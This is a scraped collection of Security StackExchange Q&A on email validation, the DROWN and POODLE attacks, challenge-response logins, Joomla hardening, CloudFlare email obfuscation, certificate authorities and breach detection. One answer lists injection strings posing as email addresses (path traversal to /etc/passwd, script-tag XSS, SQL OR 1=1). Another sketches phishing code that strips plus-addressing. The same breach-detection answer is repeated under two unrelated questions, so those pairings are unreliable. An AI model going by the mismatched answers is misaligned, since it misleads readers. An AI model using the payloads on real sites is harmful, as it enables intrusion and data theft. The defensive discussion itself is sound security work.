obs-dtext ; "[", "]", or "\" You can see that again, most characters are allowed (even non-ascii characters ). Possible attacks would be: [email protected]&a=////etc/passwd foo@bar(<script>alert(1)</script>).com foo@'/**/OR/**/1=1/**/--/**/ Conclusion You can't validate email addresses safely. Instead, you need to make sure to have proper defenses in place (HTML encoding for XSS, prepared statements for SQL injection, etc). As defense in depth, you could forbid quoted strings and comments to gain some amount of protection, as these two things allow the most unusual characters and string. But some attacks are still possible, and you will exclude a small amount of users. If you do need additional input filtering that exceeds the limits of the email format, because you do not trust the rest of your application, you should carefully consider what you do allow and what you do not allow. For example + is used by gmail to allow filtering incoming emails, so not allowing it may lead users to not sign up. Other characters may be used by other providers for similar functionalities. A first approach might be to only allow alphanum + ! # % * + - = ? ^ _ . | ~ . This would disallow < > ' " ` / $ { } & , which are characters used in common attacks. Depending on your application, you may want to disallow further characters. And as you mentioned RFC822 : It is a bit outdated (it's from 1982), but even it allows for quoted strings and comments, so just saying that you only accept RFC822 compliant addresses would not only not be practical, but also not work. Also, are you checking your emails client-side? The JS code gives that impression. An attacker could just bypass client-side checks.
{ "source": [ "https://security.stackexchange.com/questions/116116", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11902/" ] }
116,139
There is a new recent attack "on TLS" named "DROWN" . I understand that it appears to use bad SSLv2 requests to recover static (certificate) keys. My question is: How? How can you recover static encryption or signature keys using SSLv2? Bonus questions: How can I prevent the attack from applying to me as a server admin? How could the attack spawn in the first place?
To understand the attack, one must recall Bleichenbacher's attack from the late 20th century. In that attack, the attacker uses the target server as an oracle . When using RSA-based key exchange, the client is supposed to send a secret value (the "pre-master secret") encrypted with the server's public key, using PKCS#1 v1.5 padding (called "type 2"). Bleichenbacher's attack relied on sending carefully crafted values in lieu of a properly encrypted message, and observe the server's reaction. The server might respond (most of the time) with an error saying "I processed that but it did not yield a proper PKCS#1 v1.5 type 2 padding"; but sometimes, the decryption seems to work and the server proceeds with whatever it obtained. The attacker sees that difference in behaviour, and thus gains a tiny bit on information on the private key. After a million connections or so, the attacker knows enough to perform an arbitrary decryption and thus break a previously recorded session. This attack is of the same kind, but with a new technique that relies on the specificities of SSL 2.0. SSL 2.0 is an old protocol version that has several serious flaws and should not be used. It has been deprecated for more than 15 years. It has been even formally prohibited in 2011. Nevertheless, some people still support SSL 2.0. Even worse, they support it with so-called "export" cipher suites where encryption strength is down to about 40 bits. So the attack works a bit like this: The attacker observes an encrypted SSL/TLS session (a modern, robust one, say TLS 1.2) that uses RSA key exchange, and he would like to decrypt it. Not all SSL/TLS sessions are amenable to the attack as described; there is a probability of about 1/1000 that the attack works. So the attacker will need to gather about a thousand encrypted sessions, and will ultimately break through one of them. The authors argue that in a setup which looks like the ones for CRIME and BEAST (hostile Javascript that triggers invisible connections in the background), this collection can be automated. The server carelessly uses the same RSA private key for a SSL 2.0 system (maybe the same server, maybe another software system that may implement another protocol, e.g. a mail server). The attacker has the possibility to try to talk to that other system. The attacker begins a SSL 2.0 handshake with that system, using as ClientMasterKey message a value derived from the one that the attacker wants to decrypt. He also asks for using a 40-bit export cipher suite. The attacker observes the server's response, and brute-forces the 40-bit value that the server came up with when it decrypted the value sent by the attacker. At that point, the attacker knows part of the result of the processing of his crafted value by the server with its private key. This indirectly yields a bit of information on the encrypted message that the attacker is really interested in. The attacker needs to do steps 3 and 4 about a few thousand times, in order to recover the encrypted pre-master secret from the target session. For the mathematical details, read the article . Conditions for application: The connection must use RSA key exchange. The attack, as described, cannot do much against a connection that uses DHE or ECDHE key exchange (which are recommended anyway for forward secrecy ). The same private key must be used in a system that implements SSL 2.0, accessible to the attacker, and that furthermore accepts to negotiate an "export" cipher suite. Note : If OpenSSL is used and not patched for CVE-2015-3197 , even if "export" cipher suites are disabled, a malicious client can still negotiate and complete a handshake with those disabled cipher suites. The attacker must be able to make a few thousands or so connections to that SSL 2.0 system, and then run a 40-bit brute force for each; the total computing cost is about 2 50 operations. It must be well understood that the 2 50 effort is for each connection that the attacker tries to decrypt. If he wants to, say, read credit card numbers from connections he observes, he will need to make a non-negligible amount of work for each credit card number. While the attack is very serious, it is not really practical in that CCN-grabbing setup. The solution: don't use SSL 2.0. Dammit. You should have stopped using SSL 2.0 in the previous millenium. When we said "don't use it, it is weak", we really meant it. It is high time to wake up and do your job. Supporting weak ("export") cipher suites was not a smart move either. Guess what ? Weak crypto is weak. Deactivating SSL 2.0 is the only right way to fix the issue. While you are at it, deactivate SSL 3.0 as well. (And that fashion of using all-uppercase acronyms for attacks is really ridiculous.)
{ "source": [ "https://security.stackexchange.com/questions/116139", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71460/" ] }
116,144
I want to authenticate a client of a webpage and make sure it is a particular user. Let say that we already agreed on a particular hash ( SHA256 , actually, which I think is secure enough for this) and we both already exchanged a key in a file through a trusted medium. This key is pretty much a text file with 2K of random letters. I have it stored in my server, they have it stored somewhere in their computer. These are the steps devised to authenticate the client: The server generates a challenge , a random string of 128 letters. The server sends the challenge to the client's browser. The client has access to an input field where they load their key file. The client computes an answer by appending key to their challenge contents and computing its hash. The client sends back only the answer for this particular challenge . The server compares the received answer with one generated locally and if they match then I can assume that the client is the person who I think it is. Final assumption, the exchange of both the challenge and the answer through the web may happen through an insecure channel. Actually, assume that it WILL happen through an insecure channel, i.e. HTTP. Is this scheme secure? If not, what are its pitfalls? In step 4, does it make a difference if I compute the hash as challenge + key instead of key + challenge . I guess this has to do with the hash algorithm I chose, and I think SHA256 handles those things well, but I'm no expert. Does it matters much if I increase/decrease the length of the key and challenge ?
No cryptography using client-side JavaScript can be secure without HTTPS. Any MITM attacker can send JavaScript that can do anything with the secrets the browser has access to, then there will be no secret. If you absolutely cannot use HTTPS, the user must have to a tool to compute the response outside the browser and paste the result into the browser. Even so, any data transmitted after the authentication is still subject to interception and modification, which makes the authentication pretty useless from a user-protection perspective. Please read: What's wrong with in-browser cryptography? - Tony Arcieri or Javascript Cryptography Considered Harmful - NCC Group or the 1,030,000 results returned for searching "wrong with javascript cryptography" on Google Edit: BTW, even if you use an external program to handle the authentication and maybe even encryption of data that goes over HTTP, you may still have a lowered security compared to just using HTTPS. Best example is the Korean SEED cipher which exposes users by locking users down to and training them to trust ActiveX controls and IE. See this blog article ).
{ "source": [ "https://security.stackexchange.com/questions/116144", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103036/" ] }
116,248
I'm going to create a new website with Joomla! 3. Potentially, this site will get me some money through ads but I'm a little worried about what could be done to attack it. I say a little because I'm not hoping in huge revenues and I don't think someone will try to bribe me into giving them control of my site (like it happened to the owner of the @N twitter account), but when dealing with black hats you never know. I do not need to provide public authentication or to have people other than me input data on this website (I might accept inputs via mail and copy-paste them by hand after checking their content, since I want the writing quality to be good and consistent with the resto of the site). I will use free Joomla! themes - the basic ones included with the standard installation might do fine. Is there any threat that I, as a security noob who understands a little about how the Internet works (let's say just enough to understand Heartbleed), absolutely need to protect from? Should I hire a professional developer for my project, or are there just a few things I should do to protect my site reasonably (making hacking not worth the effort) that I could learn about in, say, under a month of an 8/5 worker's free time?
The most important thing to do when you use 3rd party applications like Joomla! is to always keep them up-to-date. Most attacks are targeting vulnerabilities which were patched long ago and only hit those people who neglect updating. So create a regular reminder in your calendar to check if an update is available for Joomla (as well as any themes and plugins you are running) and install it. Updating Joomla is very simple, because it can be done from within the administration interface. You don't need any advanced IT skills to do that. But it is very important to do this regularly! Be wary of any plugins, themes, extensions and other addons which did not release any update for a long time. It means that either that addon is perfect and has no security problems, or that the developer simply doesn't care to release any more updates to fix security vulnerabilities. But the latter case is much, much more likely. You should also check the Vulnerable Extension List regularly and avoid everything listed there. For more information, consult the security and performance FAQ on the Joomla wiki. This actually applies not just to an application like Joomla but to your whole software stack, from operating system to webserver to PHP to MYSQL. OS and webserver also need to be configured securely. But when you use a hosted solution, then the provider will likely take care of everything except the applications you install yourself, so you likely don't have to worry about that. But it's a different thing when you rent a virtual server which provides you with a naked operating system (or not even that) and expects you to set up everything on your own. In that case you are responsible for updating everything. When you require this for your project, you should consider hiring someone who knows how to harden a server properly, who knows which components need to be updated and how this is done. But the person you are looking for is not a software developer. It's a system administrator .
{ "source": [ "https://security.stackexchange.com/questions/116248", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103140/" ] }
116,301
The POODLE vulnerability exploited a weakness in SSLv3. The newer DROWN vulnerability exploits a weakness in SSLv2. Part of my protection against POODLE (for my webserver) was to disable SSLv3 and earlier. So am I already safe from DROWN?
POODLE is an abuse of a flaw in SSL 3.0. You are technically protected against POODLE if you disabled support for SSL 3.0. DROWN leverages a flaw in SSL 2.0. You might be technically protected against POODLE, in the sense explained above, and still be vulnerable to DROWN. Of course, SSL 2.0 has other flaws and it was already deprecated / forbidden; it has been so for a long time. The advice for POODLE was often worded as "deactivate everything that is older than TLS 1.0" and this includes SSL 2.0, but, honestly, SSL 2.0 should have already been deactivated, killed, and its corpse dumped at sea, long before POODLE. If you had to wait for POODLE to disable SSL 2.0, then you were already very very sloppy. There is no upper limit to sloppiness, so you are encouraged to test whether your server still accepts SSL 2.0. Just in case.
{ "source": [ "https://security.stackexchange.com/questions/116301", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71333/" ] }
116,354
I saw this on CloudFlares homepage: CloudFlare protects against a range of threats: cross site scripting, SQL injection, comment spam, excessive bot crawling, email harvesters, and more. How could a company like CloudFlare block crawler bots and email harvester? I asume they are smart enough not to use User-Agent: Evil-Email-Harvester . So how do you differentiate a bot like an email harvester from a normal user? I guess you could see that it is some kind of bot because you get requests for multiple sites from the same IP. But that would also be the case for many legit IPs, like a VPN. How do you tell the good from the bad?
CloudFlare serves as a guard between your webserver and the client. Every content the client receives got provided by your webserver and filtered by CloudFlare. This way, CloudFlare obfuscates email addresses by filtering them using a regex before delivering it to the client. If your website contains the email <a href="mailto:[email protected]">[email protected]</a> CloudFlare will replace it with <a href="/cdn-cgi/l/email-protection#fed8ddcfcfcbc5d8ddc8cac5d8ddcfcfcbc5d8ddc7c7c5d8ddcfcecac5d8ddc7c9c5d8ddcac8c5d8ddc7c6c5d8ddcfccccc5">&#115;&#64;&#115;&#99;&#104;&#97;&#46;&#98;&#122;</a> The /cdn-cgi/ - folder, though it still points to the webserver, is only for CloudFlare which will automatically filter everything you submit, deobfuscating and returning the correct email address. Of course this is not bulletproof (this is simply not possible) as a bot can continue on that URL or search for encoded email - patterns. This is a rare occurence and most of todays simple crawlers wont find your email. You shouldnt rely on this approach - CF is already quite popular and it is easy to detect and deobfuscate those email addresses. Using your own, unique obfuscating techniques is more likely to be safe against intelligent harvesters as it is too much work adapting the crawler for every single obfuscation technique.
{ "source": [ "https://security.stackexchange.com/questions/116354", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98538/" ] }
116,391
In our IT Security class we have been told that you need CA's to prevent attacks on a digital signature. Sadly, our docent didn't elaborate how such attack would be performed - I can only guess that someone would try to do a MitM: Alice wants to authenticate towards Bob, so she writes him a message and signs that with her private key. She also appends her public key. Eve intercepts the message and verifies the message with Alice's public key, then signs the message with her own private key and forwards it to Bob, appending her own public key instead of Alice's. Bob receives the message assuming it's from Alice, verifying it with the appended public key (from Eve) and is now sure to communicate with Alice. So if Bob would just have looked up Alice's public key at some CA, he would have known that the appended key was wrong. Is that the scenario people are generally referencing to when it comes to why you need CAs?
A digital signature , like all cryptographic algorithm, does not solve problems, it just moves them around. Take care that signatures are NOT encryption. If someone tried to explain signatures as a kind of encryption, then go find them and hit them in the teeth with a wrench, repeatedly. Tell them that they are unworthy, and I am disappointed with them. This flawed explanation does not work, never worked, and spreads only confusion. In a signature system, there is a message m , a public key k p , a private key k s , and a signature s . The signature generation algorithm computes s from m and k s . The signature verification algorithm takes m , s and k p , and returns either "true" or "false". When it returns "true", what this means is that whoever owns the public key (i.e. knows the corresponding private key) was involved in the generation of signature s on the specific message m . The important point is in the key ownership: the signature verification algorithm does not tell you "yep, this is signed by Bob"; it only tells you "yep, this is signed by whoever owns that public key". This guarantees that the signer is really Bob only if you have a way to make sure that the public key you see is really Bob's public key. If Bob simply sent his public key along with the signed message, it would be easy to impersonate Bob by simply saying "hello, I am Bob, here is my public key, and here is my signed message". It would prove nothing at all. The attack here is simple, it is called "lying". While signatures are useful (indeed, they reduced the problem of verifying the provenance of several messages to the problem of associated a single public key with its owner), they don't magically guarantee ownership out of thin air. This is where Certification Authorities come into play. The CA is an organism whose job is to make sure that Bob really owns his alleged public key; presumably, the CA does that by meeting Bob in person, or some other mechanism of that kind. When the CA has duly verified Bob's ownership of his key, the CA puts Bob's identity (his name) and his public key in a certificate . The CA then signs the certificate. Alice's machine can then verify the signature on the certificate, thereby making sure that the certificate contents are really from the expected CA. At which point Alice has some guarantee about the fact that the public key she sees in the certificate is really Bob's key, and she can use it to verify signatures which have purportedly been computed by Bob. At this point you should say: "But how can Alice verify the signature on the certificate by the CA ? She would have to know the CA public key !" And, indeed, the problem has again been moved, to the question of CA key ownership. We can move it yet another time, with another CA. And so on. But it must stop somewhere. That "somewhere" is the root CA . A root CA is a CA whose pubic key you already know, absolutely. That's the magic part. In practice, your computer comes with an operating system that already includes the public key of a hundred or so of root CA, who made a deal with Microsoft to the effect that their public keys are inherently known (and trusted) by all Windows systems.
{ "source": [ "https://security.stackexchange.com/questions/116391", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90118/" ] }
116,396
I'm always concerned about the security of services I use. I'm even more concerned since security breaches have been happening more and more lately, and they always generate a lot of noise in the media. Now I'm already trying to secure my accounts to the maximal amount possible, like using 2FA wherever possible and using a strong password manager. However these measures won't protect upon security breaches. Is there a somewhat reliable method to detect security breaches before they are announced so I can act and don't have to react? Optional bonus question : What steps can I take to ensure security of my data in case there's an unannounced breach?
You can't detect it with 100% certainty because not everyone who steals your data wants to phish you, or sell it. But for those who do want to phish you - and that's a large portion of them - there are some tricks you can apply. In most places, you cannot provide fake details. You need to enter your name, physical address, credit card information, social security number, etc. You don't really have much control over the real details. However, what you do have control over is your email address. You can always provide a dummy email account to anyone, for any reason, even if the rest of your details are required to be legitimate. Roving Email Address Method Let's call this REAM . I like REAM. Here's what I do: I buy a few domains and create unlimited amounts of email addresses, then use a different email address for each website on which I have an account. I also use Gmail, Yahoo, etc. Buy 2-3 reasonable domain names, and give the accounts reasonable, unique names like [email protected] , [email protected] , etc. You can also use free email providers, but having to repeatedly enter your phone number might cause you some issues. It's a lot of work, but it pays off in the long run. When you're asked for your email address at a retailer, give them one of those emails, and use it ONLY for them. Make sure you use each email address only once. Carry a list of email addresses in your wallet. Now why would we want to detect phishing, instead of sending it to the spam folder? Because a phishing attempt on these emails may indicate a breach. I've found that, with astounding regularity, without even providing my email address to additional companies beyond the first one, that I get phished on a regular basis on each account. In fact, I've seen dozens of such breaches. Here's a small list of some notable phishing attacks I've found: OPM (2011, undisclosed until 2015) IRS (2015, undisclosed until late 2015) IRS (2016. Repeat of 2015? Undisclosed until recently) Pizza Hut (early 2015, breach still undisclosed) Target (2013?) In most of the emails, the attackers usually have bad English. In some, they do not. They'll also google a location near the provided address, and say they have a job opportunity, etc. In some cases, I will even get phone calls from them in the same area code as me! It's actually very easy to get a burner phone at Wal-Mart and have it set to the same area code as your victim. If you're clever enough, and they're in the same country, then you can quickly lead them down the path of the damned. In nearly every case, they try to get me to click on an infected website. I will go there anyway (on a dummy+virtual machine, obviously) because I am a masochistic security researcher who revels in reverse-engineering malware, and making attackers suffer. Suffer mortals as your pathetic magic betrays you! You may not want to visit them, however. The Multiple Phone Number Method Some like to try and use multiple phone numbers. I would not do this. It's neither reliable, nor effective because: Phone numbers can be enumerated very easily, and auto-dialed/texted. It costs a lot of money to have multiple phone numbers. You'll likely get calls from people who knew the person who knew the previous owner. Therefore, REAM is a much better way than this. The Plus Email Address Method I guess we can call this PEAM . Others have suggested the plus email address method. Gmail supports this. For example, if your email address is [email protected] , it's recommended to use [email protected] instead. Google will apparently discard the plus side of the email address. Using this method could be good for a lot of reasons. However, very few - if any - of those reasons would apply to actual skilled phishers. I would not recommend using this method because it may only work against run-of-the-mill spammers, not actual skilled phishers. Here's why: Phishers are more intelligent than the average spammer. They are targeting you personally. If you respond, they will build a profile on you, or maybe they already have a profile built on you based on stolen data sets. Spammers are willy-nilly sending spam to everyone they can. Your plus addressing still gets delivered to your inbox. And you just know you want those lengthening pills... so you end up buying them anyway, and they don't work, and all the women laugh at you. [ sobbing uncontrollably ] Ahem... This method can be easily circumvented with code. I'll demonstrate: List<String> possiblyIntelligentTargetList = new List<String>(); foreach (string email in emailAddressCollection) { // We might've found a plus-size individual if (email.Contains("+")) { // Ignore the plus email address string realEmailAddress = email.Split("+")[0] + "@" + email.Split("@")[1]; // Phish user's actual email address. PhishUser(realEmailAddress); // Add their provided email to a new list so we can analyze later possiblyIntelligentTargetList.Add(email); } else { PhishUser(email); } } Of course, this could be made much better, but this is a rough example of how easy it would be do to this. It only took me like 0.05 miliseconds to write this. With the above code snippet, the plus side of the email address is discarded. Now how will you know where the breach came from? Because of this, I would recommend that you get REAM ed. Trawling the "Deep Web" bmargulies brings up an interesting, and very good point: your data may sometimes appear on the Deep Web. However, this information is usually for sale. While yes, it may be possible to detect a breach before it's announced by visiting the Deep Web or using an Identity Protection Service that does, this method has it's drawbacks as well. Here are a few problems I see with looking on the Deep Web: While some Identity Protection services are excellent, they may cost a fair bit of money. Identity protection services may be provided for free, but they usually come after the breach announcement, and the protection only lasts for a limited time, usually around 1-2 years. You usually have to buy this information from attackers, unless they released it for the Lulz. The breached data simply may not appear on the Deep Web at all. As you can see, there are a lot of pros and cons of every single method here. No method is perfect. It's impossible to get 100% perfection. REAM also detects individual breaches This method doesn't just detect breaches to companies. It detects breaches to individuals. You may find that, after giving someone your email address, they send you phishing attacks several months later. It may come from them, or it may come from someone else who hacked them. Now that my data has been stolen, what do I do? If you have a strong suspicion that your sensitive information has been stolen, you should do the following: Shut down and replace all credit and debit cards associated with the aforementioned email address. Put a freeze on your credit so they can't do anything with the details. Inform the company/individual that they've likely been hacked, so they can take the appropriate steps. Read about Virtual Credit Cards in the answer provided by emory for the bonus question below.
{ "source": [ "https://security.stackexchange.com/questions/116396", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71460/" ] }
116,404
I have it so flash doesn't start on page load for security and performance. Lately I have been noticing That some pages will load with a flash document that takes up the full screen. I can see it as it has not started running and gives the gray box to enable flash. I found that when this flash document is loaded it is invisible and tricks the user by taking the click actions of the user when the user thinks there clicking on the page. I would like to know what this is and how to get rid of it all together. It looks to be used to reroute users to advertisements. I have noticed it on a lot of news websites from google news. Has anyone else discovered this on a website and found out what it is and how to stop it? So far what i have to do is as the flash document has not loaded I can right click on it and have it hidden and not run. This feels like a workaround for something that a user should not have to deal with.
You can't detect it with 100% certainty because not everyone who steals your data wants to phish you, or sell it. But for those who do want to phish you - and that's a large portion of them - there are some tricks you can apply. In most places, you cannot provide fake details. You need to enter your name, physical address, credit card information, social security number, etc. You don't really have much control over the real details. However, what you do have control over is your email address. You can always provide a dummy email account to anyone, for any reason, even if the rest of your details are required to be legitimate. Roving Email Address Method Let's call this REAM . I like REAM. Here's what I do: I buy a few domains and create unlimited amounts of email addresses, then use a different email address for each website on which I have an account. I also use Gmail, Yahoo, etc. Buy 2-3 reasonable domain names, and give the accounts reasonable, unique names like [email protected] , [email protected] , etc. You can also use free email providers, but having to repeatedly enter your phone number might cause you some issues. It's a lot of work, but it pays off in the long run. When you're asked for your email address at a retailer, give them one of those emails, and use it ONLY for them. Make sure you use each email address only once. Carry a list of email addresses in your wallet. Now why would we want to detect phishing, instead of sending it to the spam folder? Because a phishing attempt on these emails may indicate a breach. I've found that, with astounding regularity, without even providing my email address to additional companies beyond the first one, that I get phished on a regular basis on each account. In fact, I've seen dozens of such breaches. Here's a small list of some notable phishing attacks I've found: OPM (2011, undisclosed until 2015) IRS (2015, undisclosed until late 2015) IRS (2016. Repeat of 2015? Undisclosed until recently) Pizza Hut (early 2015, breach still undisclosed) Target (2013?) In most of the emails, the attackers usually have bad English. In some, they do not. They'll also google a location near the provided address, and say they have a job opportunity, etc. In some cases, I will even get phone calls from them in the same area code as me! It's actually very easy to get a burner phone at Wal-Mart and have it set to the same area code as your victim. If you're clever enough, and they're in the same country, then you can quickly lead them down the path of the damned. In nearly every case, they try to get me to click on an infected website. I will go there anyway (on a dummy+virtual machine, obviously) because I am a masochistic security researcher who revels in reverse-engineering malware, and making attackers suffer. Suffer mortals as your pathetic magic betrays you! You may not want to visit them, however. The Multiple Phone Number Method Some like to try and use multiple phone numbers. I would not do this. It's neither reliable, nor effective because: Phone numbers can be enumerated very easily, and auto-dialed/texted. It costs a lot of money to have multiple phone numbers. You'll likely get calls from people who knew the person who knew the previous owner. Therefore, REAM is a much better way than this. The Plus Email Address Method I guess we can call this PEAM . Others have suggested the plus email address method. Gmail supports this. For example, if your email address is [email protected] , it's recommended to use [email protected] instead. Google will apparently discard the plus side of the email address. Using this method could be good for a lot of reasons. However, very few - if any - of those reasons would apply to actual skilled phishers. I would not recommend using this method because it may only work against run-of-the-mill spammers, not actual skilled phishers. Here's why: Phishers are more intelligent than the average spammer. They are targeting you personally. If you respond, they will build a profile on you, or maybe they already have a profile built on you based on stolen data sets. Spammers are willy-nilly sending spam to everyone they can. Your plus addressing still gets delivered to your inbox. And you just know you want those lengthening pills... so you end up buying them anyway, and they don't work, and all the women laugh at you. [ sobbing uncontrollably ] Ahem... This method can be easily circumvented with code. I'll demonstrate: List<String> possiblyIntelligentTargetList = new List<String>(); foreach (string email in emailAddressCollection) { // We might've found a plus-size individual if (email.Contains("+")) { // Ignore the plus email address string realEmailAddress = email.Split("+")[0] + "@" + email.Split("@")[1]; // Phish user's actual email address. PhishUser(realEmailAddress); // Add their provided email to a new list so we can analyze later possiblyIntelligentTargetList.Add(email); } else { PhishUser(email); } } Of course, this could be made much better, but this is a rough example of how easy it would be do to this. It only took me like 0.05 miliseconds to write this. With the above code snippet, the plus side of the email address is discarded. Now how will you know where the breach came from? Because of this, I would recommend that you get REAM ed. Trawling the "Deep Web" bmargulies brings up an interesting, and very good point: your data may sometimes appear on the Deep Web. However, this information is usually for sale. While yes, it may be possible to detect a breach before it's announced by visiting the Deep Web or using an Identity Protection Service that does, this method has it's drawbacks as well. Here are a few problems I see with looking on the Deep Web: While some Identity Protection services are excellent, they may cost a fair bit of money. Identity protection services may be provided for free, but they usually come after the breach announcement, and the protection only lasts for a limited time, usually around 1-2 years. You usually have to buy this information from attackers, unless they released it for the Lulz. The breached data simply may not appear on the Deep Web at all. As you can see, there are a lot of pros and cons of every single method here. No method is perfect. It's impossible to get 100% perfection. REAM also detects individual breaches This method doesn't just detect breaches to companies. It detects breaches to individuals. You may find that, after giving someone your email address, they send you phishing attacks several months later. It may come from them, or it may come from someone else who hacked them. Now that my data has been stolen, what do I do? If you have a strong suspicion that your sensitive information has been stolen, you should do the following: Shut down and replace all credit and debit cards associated with the aforementioned email address. Put a freeze on your credit so they can't do anything with the details. Inform the company/individual that they've likely been hacked, so they can take the appropriate steps. Read about Virtual Credit Cards in the answer provided by emory for the bonus question below.
{ "source": [ "https://security.stackexchange.com/questions/116404", "https://security.stackexchange.com", "https://security.stackexchange.com/users/59642/" ] }
116,413
I noticed the following site: nightchamber.com A user account is automatically generated on first visit and keyed against a uuid, the id is then stuffed into the session and used to make a link the user can bookmark to get back to their "account". As long as that link/id remains secret, the user has a unique account to use with no effort on their part. Are there any immediate drawbacks using this method for a super-fast login and/or signup?
You can't detect it with 100% certainty because not everyone who steals your data wants to phish you, or sell it. But for those who do want to phish you - and that's a large portion of them - there are some tricks you can apply. In most places, you cannot provide fake details. You need to enter your name, physical address, credit card information, social security number, etc. You don't really have much control over the real details. However, what you do have control over is your email address. You can always provide a dummy email account to anyone, for any reason, even if the rest of your details are required to be legitimate. Roving Email Address Method Let's call this REAM . I like REAM. Here's what I do: I buy a few domains and create unlimited amounts of email addresses, then use a different email address for each website on which I have an account. I also use Gmail, Yahoo, etc. Buy 2-3 reasonable domain names, and give the accounts reasonable, unique names like [email protected] , [email protected] , etc. You can also use free email providers, but having to repeatedly enter your phone number might cause you some issues. It's a lot of work, but it pays off in the long run. When you're asked for your email address at a retailer, give them one of those emails, and use it ONLY for them. Make sure you use each email address only once. Carry a list of email addresses in your wallet. Now why would we want to detect phishing, instead of sending it to the spam folder? Because a phishing attempt on these emails may indicate a breach. I've found that, with astounding regularity, without even providing my email address to additional companies beyond the first one, that I get phished on a regular basis on each account. In fact, I've seen dozens of such breaches. Here's a small list of some notable phishing attacks I've found: OPM (2011, undisclosed until 2015) IRS (2015, undisclosed until late 2015) IRS (2016. Repeat of 2015? Undisclosed until recently) Pizza Hut (early 2015, breach still undisclosed) Target (2013?) In most of the emails, the attackers usually have bad English. In some, they do not. They'll also google a location near the provided address, and say they have a job opportunity, etc. In some cases, I will even get phone calls from them in the same area code as me! It's actually very easy to get a burner phone at Wal-Mart and have it set to the same area code as your victim. If you're clever enough, and they're in the same country, then you can quickly lead them down the path of the damned. In nearly every case, they try to get me to click on an infected website. I will go there anyway (on a dummy+virtual machine, obviously) because I am a masochistic security researcher who revels in reverse-engineering malware, and making attackers suffer. Suffer mortals as your pathetic magic betrays you! You may not want to visit them, however. The Multiple Phone Number Method Some like to try and use multiple phone numbers. I would not do this. It's neither reliable, nor effective because: Phone numbers can be enumerated very easily, and auto-dialed/texted. It costs a lot of money to have multiple phone numbers. You'll likely get calls from people who knew the person who knew the previous owner. Therefore, REAM is a much better way than this. The Plus Email Address Method I guess we can call this PEAM . Others have suggested the plus email address method. Gmail supports this. For example, if your email address is [email protected] , it's recommended to use [email protected] instead. Google will apparently discard the plus side of the email address. Using this method could be good for a lot of reasons. However, very few - if any - of those reasons would apply to actual skilled phishers. I would not recommend using this method because it may only work against run-of-the-mill spammers, not actual skilled phishers. Here's why: Phishers are more intelligent than the average spammer. They are targeting you personally. If you respond, they will build a profile on you, or maybe they already have a profile built on you based on stolen data sets. Spammers are willy-nilly sending spam to everyone they can. Your plus addressing still gets delivered to your inbox. And you just know you want those lengthening pills... so you end up buying them anyway, and they don't work, and all the women laugh at you. [ sobbing uncontrollably ] Ahem... This method can be easily circumvented with code. I'll demonstrate: List<String> possiblyIntelligentTargetList = new List<String>(); foreach (string email in emailAddressCollection) { // We might've found a plus-size individual if (email.Contains("+")) { // Ignore the plus email address string realEmailAddress = email.Split("+")[0] + "@" + email.Split("@")[1]; // Phish user's actual email address. PhishUser(realEmailAddress); // Add their provided email to a new list so we can analyze later possiblyIntelligentTargetList.Add(email); } else { PhishUser(email); } } Of course, this could be made much better, but this is a rough example of how easy it would be do to this. It only took me like 0.05 miliseconds to write this. With the above code snippet, the plus side of the email address is discarded. Now how will you know where the breach came from? Because of this, I would recommend that you get REAM ed. Trawling the "Deep Web" bmargulies brings up an interesting, and very good point: your data may sometimes appear on the Deep Web. However, this information is usually for sale. While yes, it may be possible to detect a breach before it's announced by visiting the Deep Web or using an Identity Protection Service that does, this method has it's drawbacks as well. Here are a few problems I see with looking on the Deep Web: While some Identity Protection services are excellent, they may cost a fair bit of money. Identity protection services may be provided for free, but they usually come after the breach announcement, and the protection only lasts for a limited time, usually around 1-2 years. You usually have to buy this information from attackers, unless they released it for the Lulz. The breached data simply may not appear on the Deep Web at all. As you can see, there are a lot of pros and cons of every single method here. No method is perfect. It's impossible to get 100% perfection. REAM also detects individual breaches This method doesn't just detect breaches to companies. It detects breaches to individuals. You may find that, after giving someone your email address, they send you phishing attacks several months later. It may come from them, or it may come from someone else who hacked them. Now that my data has been stolen, what do I do? If you have a strong suspicion that your sensitive information has been stolen, you should do the following: Shut down and replace all credit and debit cards associated with the aforementioned email address. Put a freeze on your credit so they can't do anything with the details. Inform the company/individual that they've likely been hacked, so they can take the appropriate steps. Read about Virtual Credit Cards in the answer provided by emory for the bonus question below.
{ "source": [ "https://security.stackexchange.com/questions/116413", "https://security.stackexchange.com", "https://security.stackexchange.com/users/89162/" ] }
116,566
I've watched Mr. Robot lately and can't stop thinking why it was so hard to decrypt files encrypted using AES encryption with a 256-bit key. Let us say the only method to find the key is through brute force. Can't we set a computer to brute force starting from the first possible key, and another to begin from the last possible key, and perhaps a few computers to try the keys in the middle? Wouldn't that reduce time dramatically?
Sure it's possible, but it doesn't really help. The number of possibilities is just too large. Consider that a 256-bit key has 2 256 possible values. That's 12✕10 76 , or 12 followed by 76 zeroes. If we generously assume that a computer can test a trillion (that's 10 12 ) possible keys a second, and that we have a trillion computers (where will we get them from?) performing the key search, it will take 12✕10 76 /(10 12 ✕10 12 ) seconds to search the entire keyspace. That's 12✕10 52 seconds. As there are only 3,155,760,000 seconds in a century, it will take approximately 4✕10 43 centuries to try all possible keys. There's a 50-50 chance that you'll find the key in only half that time. That's the way encryption is designed. The number of possibilities are just too large to be cracked in time that is interesting for humans.
{ "source": [ "https://security.stackexchange.com/questions/116566", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103485/" ] }
116,596
This is a spin off from: Use multiple computers for faster brute force Here's at least one source which says that quantum computers are on the way to being able to break RSA in the not too distant future. I am not a security expert, and don't know the difference between that and AES, but might this throw a monkey wrench into this idea that it's impossible to crack these modern encryption mechanisms? MIT's new 5-atom quantum computer could make today's encryption obsolete Perhaps some of you who are more knowledgeable on the subject could weigh in?
